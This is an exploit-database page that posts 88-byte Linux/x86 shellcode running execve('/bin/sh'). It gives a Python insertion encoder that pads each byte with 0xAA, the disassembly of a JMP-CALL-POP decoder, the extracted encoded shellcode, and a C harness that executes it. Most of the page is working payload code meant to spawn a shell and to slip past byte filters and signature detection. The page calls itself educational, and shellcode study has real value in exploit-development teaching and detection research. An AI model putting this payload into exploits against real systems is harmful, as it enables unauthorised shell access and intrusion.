Linux/x86 insertion encoder / decoder execve(/bin/sh) shellcode (88 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-08 | Type : shellcode | Platform : linux_x86
This exploit / vulnerability Linux/x86 insertion encoder / decoder execve(/bin/sh) shellcode (88 bytes) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

/*
'''
; Date: 07/03/2019
; Insertion-Encoder.asm
; Author: Daniele Votta
; Description: This program encode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
'''

#!/usr/bin/python
# Python Insertion Encoder

import random

# Execve /bin/sh (25 bytes)
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode...'

for x in bytearray(shellcode):
# Insertion Encoding
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x%02x' % 0xAA
# encoded += '\\x%02x' % random.randint(1,255)

encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x%02x,' % 0xAA
# encoded2 += '0x%02x' % random.randint(1,255)

print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/

#include<stdio.h>
#include<string.h>

/*
; Insertion-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
; Shellcode Length:50
; JMP | CALL | POP | Techniques

Insertion-Decoder: file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080: eb 1d jmp 804809f <call_decoder>

08048082 <decoder>:
8048082: 5e pop esi
8048083: 8d 7e 01 lea edi,[esi+0x1]
8048086: 31 c0 xor eax,eax
8048088: b0 01 mov al,0x1
804808a: 31 db xor ebx,ebx

0804808c <decode>:
804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
804808f: 80 f3 aa xor bl,0xaa
8048092: 75 10 jne 80480a4 <EncodedShellcode>
8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
8048098: 88 1f mov BYTE PTR [edi],bl
804809a: 47 inc edi
804809b: 04 02 add al,0x2
804809d: eb ed jmp 804808c <decode>

0804809f <call_decoder>:
804809f: e8 de ff ff ff call 8048082 <decoder>

080480a4 <EncodedShellcode>:
80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp
80480aa: 68 aa 2f aa 2f push 0x2faa2faa
80480af: aa stos BYTE PTR es:[edi],al
80480b0: 73 aa jae 804805c <_start-0x24>
80480b2: 68 aa 68 aa 2f push 0x2faa68aa
80480b7: aa stos BYTE PTR es:[edi],al
80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597]
80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp
80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp
80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp
80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533]
80480d6: bb .byte 0xbb
80480d7: bb .byte 0xbb
[+] Extract Shellcode ...
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"

======================= POC Daniele Votta =======================
*/

/* Insertion Encoded Execve /bin/sh (88 bytes) */
unsigned char code[] = \
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb";

int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}